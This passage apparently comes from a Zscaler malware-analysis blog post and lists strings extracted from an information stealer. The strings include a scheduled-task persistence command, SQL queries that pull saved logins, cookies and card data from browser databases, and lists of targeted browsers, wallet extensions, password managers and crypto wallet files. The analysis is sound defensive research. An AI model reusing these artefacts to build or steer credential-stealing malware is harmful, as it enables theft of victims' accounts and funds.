* ..*($2nd-2d-2o595
* ..\\stealer\\chromiumbrowsers.cpp
* ..\\stealer\\filesgrabber.cpp
* ..\\stealer\\geckobrowsers.cpp
* ..\\stealer\\httpclient.cpp
* ..\\stealer\\loader.cpp
* ..\\stealer\\sqlite3.cpp
* ..\\stealer\\stealer.cpp
* /c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn
\"\\WindowsAppPool\\%ls\"
* LeaveCriticalSection
* EnterCriticalSection
* Advapi32.dll
* Autofills/%ls_%ls.txt
* Available KeyboardLayouts: Gonna gather system information
* Build mark:
* CPU:
* Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x
* Can't obtain RmStartSession's address, maybe windows don't support
RestartManager
* Can't start process; last error: %x
* Can't write file; last error: %x
* Card:
* Chromium browsers paths were retrieved
* ComSpec
* Command line: %ls
* ComputerName:
* Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
* Content-Disposition: form-data; name=\"%s\"
* Content-Length: %d
* Content-Type: multipart/form-data; boundary=%s
* Cookies
* Cookies/%ls_%ls.txt
* Country: {country}
* CreditCards/%ls_%ls.txt
* Current language:
* Default
* Email
* Email/Credentials.txt
* Email:
* EnterCriticalSection
* Expand path: %ls
* Extensions were retrieved
* FALSE
* Failed to connect to %s
* Failed to download sqlite3.dll
* Failed to export functions from sqlite3.dll
* Failed to load sqlite3.dll
* Failed to retrieve chromium browsers paths
* Failed to retrieve files grabber paths
* Failed to retrieve gecko browsers paths
* File Location:
* Files grabber paths were retrieved
* FilesGrabber: Sent %ls
* Find chromium cookies db %ls
* Find chromium extension %ls with id %ls
* Find chromium history db %ls
* Find chromium login data db %ls
* Find chromium web data db %ls
* Find gecko autofills db %ls
* Find gecko cookies db %ls
* Find gecko file %ls
* Find gecko history db %ls
* Find steam data, path %ls
* Gdi32.dll
* Gecko browsers were retrieved
* Gecko/%ls/%ls/%ls
* GetModuleHandleA
* Global\\%s%x
* Gonna gather system information
* Gonna grab ChromiumBrowsers
* Gonna grab GeckoBrowsers
* Gonna grab files
* Gonna grab outlook
* Gonna grab steam
* Gonna grab telegrab
* Gonna take screenshot
* GrabFiles
* HH':'mm':'ss
* HWID:
* HandleChromiumBrowsers
* HandleGeckoBrowsers
* Hardwares:
* History/%ls_%ls.txt
* Holder:
* HttpOpenRequest fails; last error: %x
* HttpQueryInfo fails; last error: %x
* IMAP Password
* IP: {ip}
* InitializeCriticalSection
* InternetConnect fails; last error: %x
* InternetCrackUrl fails; last error: %x
* InternetOpen fails; last error: %x
* Kernel32.dll
* Key:
* LeaveCriticalSection
* Location: {location}
* Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
* Name:
* Network\\Cookies
* Ntdll.dll
* ..\\stealer\\geckobrowsers.cpp
* Ole32.dll
* Operation System:
* POP3 Password
* Password:
* ProductName
* Request
* Retrieve rule FilesGrabber, server side path: %ls
* Rstrtmgr.dll
* Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection
* SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted
FROM credit_cards
* SELECT fieldname, value FROM moz_formhistory
* SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
* SELECT host_key, is_httponly, path, is_secure, expires_utc, name,
encrypted_value FROM cookies
* SELECT origin_url, username_value, password_value FROM logins
* SELECT title, url FROM moz_places
* SELECT url, title FROM urlsFind chromium history db %ls
* SMTP Server
* ScreenSize:
* Screenshot.jpeg
* Sent log. Gonna send done message
* Sent screenshot
* Software\\Microsoft\\Office
* Software\\Valve\\Steam
* Sq~70
* SrartLoader
* Start
* SteamPath
* Successfully connected to %s
* Successfully start process
* SystemInformation.txt
* Telegram
* There's file to load. Gonna load it
* TimeZone: {timezone}
* Title:
* Tkernel32.dll
* Token retrieved: %s
* Trying to connect to %s
* URL:
* USERPROFILE|tELEGRAMdESKTOP|TDATA
* Url:
* User32.dll
* UserName:
* Username:
* Value:
* Wallets/%ls_%ls_%ls
* Wininet.dllCrypt32.dll
* Wininet.dllCrypt32.dllGdiplus.dll
* Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll
* Write file content in %ls
* Zip code: {zipcode}
* abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
* build
* cert8.db
* cert9.db
* chromium-browsers
* computername
* encrypted_key
* extensions
* filename
* files
* done
* files
* gecko-browsershi
* Sent system information
* kernel32.dll
* key3.db
* key4.db
* loader
* loghub/master
* logins.json
* msgtzn
* SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
* signons.sqlite
* sqlite3
* sqlite3_close
* sqlite3_column_blob
* sqlite3_column_bytes
* sqlite3_column_text
* sqlite3_open
* sqlite3_open_v2
* sqlite3_open_v2sqlite3_finalize
* sqlite3_prepare_v2
* sqlite3_step
* token
* username
* wallets\\
TARGETED CHROMIUM BROWSERS
* Citrio|%localappdata%\CatalinaGroup\Citrio\User Data
* Coowon|%localappdata%\Coowon\Coowon\User Data
* Liebao|%localappdata%\liebao\User Data
* QIP Surf|%localappdata%\QIP Surf\User Data
* Orbitum|%localappdata%\Orbitum\User Data
* Comodo Dragon|%localappdata%\Comodo\Dragon\User Data
* Amigo|%localappdata%\Amigo\User\User Data
* Torch|%localappdata%\Torch\User Data
* Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data
* Comodo|%localappdata%\Comodo\User Data
* 360Browser|%localappdata%\360Browser\Browser\User Data
* Maxthon3|%localappdata%\Maxthon3\User Data
* K-Melon|%localappdata%\K-Melon\User Data
* Sputnik|%localappdata%\Sputnik\Sputnik\User Data
* Nichrome|%localappdata%\Nichrome\User Data
* CocCoc|%localappdata%\CocCoc\Browser\User Data
* Uran|%localappdata%\Uran\User Data
* Chromodo|%localappdata%\Chromodo\User Data
* Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data
* Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data
* Opera|%appdata%\Opera Software\Opera Stable
* Google Chrome|%localappdata%\Google\Chrome\User Data
* Microsoft Edge|%localappdata%\Microsoft\Edge\User Data
* Chromium|%localappdata%\Chromium\User Data
* Opera|%localappdata%\Opera Software|ChromePlus
* %localappdata%\MapleStudio\ChromePlus\User Data
* Irpathium|%localappdata%\Irpathium\User Data
* 7Star|%localappdata%\7Star\7Star\User Data
* CentBrowser|%localappdata%\CentBrowser\User Data
* Chedot|%localappdata%\Chedot\User Data
* Vivaldi|%localappdata%\Vivaldi\User Data
* Kometa|%localappdata%\Kometa\User Data
* Elements Browser|%localappdata%\Elements Browser\User Data
* Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data
* Uran|%localappdata%\uCozMedia\Uran\User Data
* Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
TARGETED GECKO BROWSERS
* Firefox|%appdata%\Mozilla\Firefox\Profiles
* Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles
* BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles
* Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles
* K-Meleon|%appdata%\K-Meleon\Profiles
* Icecat|%appdata%\Mozilla\icecat\Profiles
TARGETED BROWSER EXTENSIONS
* Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad
* Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln
* EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac
* Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne
* BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi
* iWallet|kncchdigobghenbbaddojjnnaogfppfj
* Wombat|amkmjjmmflddogmhpjloimipbofnfjih
* MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm
* GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj
* Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig
* Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec
* NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao
* CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk
* Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn
* Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp
* Keplr|dmkamcknogkgcdfhhbddcghachkejeap
* Sollet|fhmfendgdocmcbmfikdcogofphimnkno
* Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae
* Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf
* ICONex|flpiciilemghbmfalicajoolhkkenfel
* Nabox Wallet|nknhiehlklippafakaeklbeglecifhad
* KHC|hcflpincpppdclinealmandijcmnkbgn
* MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn
* TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec
* Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp
* Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb
* Nifty Walletjbdaocneiiinmjbjlgalhcelgbejmnpath
* Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc
* Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc
* TezBox|mnfifefkajgofkcjkempathiaecocnkjeh
* DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik
* BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml
* Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm
* Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl
* Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp
* ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd
* Coin98 Wallet|aeachknmefphepccionboohckonoeemg
* Authenticator|bhghoamapcdpbohphigoooaddinpkbai
* Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm
* Byone|nlgbhdfgdhgbiamfdfmbikcdghpathoadd
* OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf
* LeafWallet|cihmoadaighcejopammfbmddcmdekcje
* Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb
* EOS Authenticator|oeljdldpnmdbchonielpathgobddffflal
* GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl
* Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk
* Ever|cgeeodpfagjceefieflmdfphplkenlfk
* KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk
* Rabby|acmacodkjbdgmoleebolmdjonilkdbch
* Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa
* Oxygen|fhilaheimglignddkjgofkcbgekhenbh
* Pali|mgffkfbpathihjpoaomajlbgchddlicgpn
* XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf
* Nami|lpfcbjknijpeeillifnkikgncikgfhdo
* MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm
* Keeper|lpilbniiabackdjcionkobglmddfbcjo
* Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic
* Govy|jnkelfanjkeadonecabehalmbgpfodjm
* SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmepath
* Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma
* Enkrypt|kkpllkodjelopathieedojogacfhpaihoh
* OKX|mcohilncbfahbmgdjkbpemcciiolgcge
* HashPack|gjagmgpathdbbciopjhllkdnddhcglnemk
* Eternl|kmhcihpebfmpgmihbkipmjlmmioameka
* Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba
* Martianin|efbglgofoippbgcjepnhiblaibcnclgk
* Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj
* Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi
* Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg
* NordPass|fooolghllnmhmmndgjiamiiodkpenpbb
* Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob
* LastPass|hdokiejnpimakedhajhdlcegeplioahd
* BrowserPass|naepdomgkenhinolocfifgehpathddafch
* MYKI|bmikpgodpkclnkgmnpphehdgcimmpathed
TARGETED CRYPTOCURRENCY WALLETS
* Wallets/Jaxx
Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0
* Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0
* Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0
* Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0
* Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1
* Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1
* Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0
* Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0
* Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0
* Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0
* Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1
* Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0
* Wallets/Ethereum|%appdata%\Ethereum|keystore|0
* Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0
* Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
* Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0
* Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0
* Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0
EXPLORE MORE ZSCALER BLOGS
Mystic Stealer
Read Post
Technical Analysis of HijackLoader
Read Post
CyberGate RAT and RedLine Stealer Delivered in Ongoing AutoIt Malware Campaigns
Read Post
GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX
By submitting the form, you are agreeing to our privacy policy.
THE ZSCALER EXPERIENCE
Learn about:
Your world, secured.Zero TrustSecurity Service Edge (SSE)Secure Access Service
Edge (SASE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access
Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP)
PRODUCTS & SOLUTIONS
Secure Your Users
Secure Your Workloads
Secure Your IoT and OT
Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Posture Control
Industry & Market Solutions
Partner Integrations
Zscaler Client Connector
PLATFORM
Zero Trust Exchange Platform
Secure Digital Transformation
Application Transformation
Network Transformation
Security Transformation
RESOURCES
Resource Library
Security Preview
Security & Risk Assessment
ThreatLabz Analytics & Insights
Upcoming Events
Blog
Zscaler Academy
CXO Revolutionaries
Zpedia
Ransomware Protection ROI Calculator
POPULAR LINKS
Pricing & Plans
About Zscaler
Leadership Team
Career Opportunities
Find or Become a Partner
Customer Success Center
Investor Relations
Press Center
News & Announcements
ESG
Compliance
Contact Zscaler
Home
English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues
- Brasil
Zscaler is universally recognized as the leader in zero trust. Leveraging the
largest security cloud on the planet, Zscaler anticipates, secures, and
simplifies the experience of doing business for the world's most established
companies.
English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues
- Brasil
Visit us on FacebookLinkedinFollow us on TwitterSubscribe our Youtube Channel
SitemapPrivacyLegalSecurity
© 2023 Zscaler, Inc.
All rights reserved. Zscaler™ and other trademarks listed at
zscaler.com/legal/trademarks are either (i) registered trademarks or service
marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States
and/or other countries. Any other trademarks are the properties of their
respective owners.
Zscaler uses cookies to personalize content and ads, to provide social media
features and to analyze our traffic. We also share information about your use of
our site with our social media, advertising and analytics partners.Please review
our Cookies Policy for more information.
Cookies Settings Accept Cookies